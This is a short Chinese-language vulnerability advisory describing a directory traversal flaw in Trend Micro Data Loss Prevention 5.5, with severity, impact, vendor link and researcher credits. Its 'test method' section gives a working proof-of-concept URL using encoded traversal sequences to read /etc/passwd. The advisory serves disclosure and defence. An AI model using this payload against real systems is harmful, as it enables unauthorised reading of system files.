漏洞起因
输入验证错误
危险等级
低
影响系统
Trend Micro Data Loss Prevention 5.5
不受影响系统
危害
远程攻击者可以利用漏洞获得敏感文件信息。
攻击所需条件
攻击者必须访问Trend Micro Data Loss Prevention。
漏洞信息
Trend Micro Data Loss Prevention是一款趋势科技发行的数据外泄管理系统。
Trend Micro Data Loss Prevention不正确过滤用户提交的编码的目录遍历序列字符,攻击者可以提交恶意请求绕过WEB ROOT限制,以WEB权限查看系统文件内容。
测试方法
https://IP:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c 0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a e%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/etc/passwd
厂商解决方案
目前没有详细解决方案提供:
http://us.trendmicro.com/us/products/enterprise/data-loss-prevention/index.html
漏洞提供者
Luis Martinez, Sergio Lopez,White Hat Consultores
0 条评论。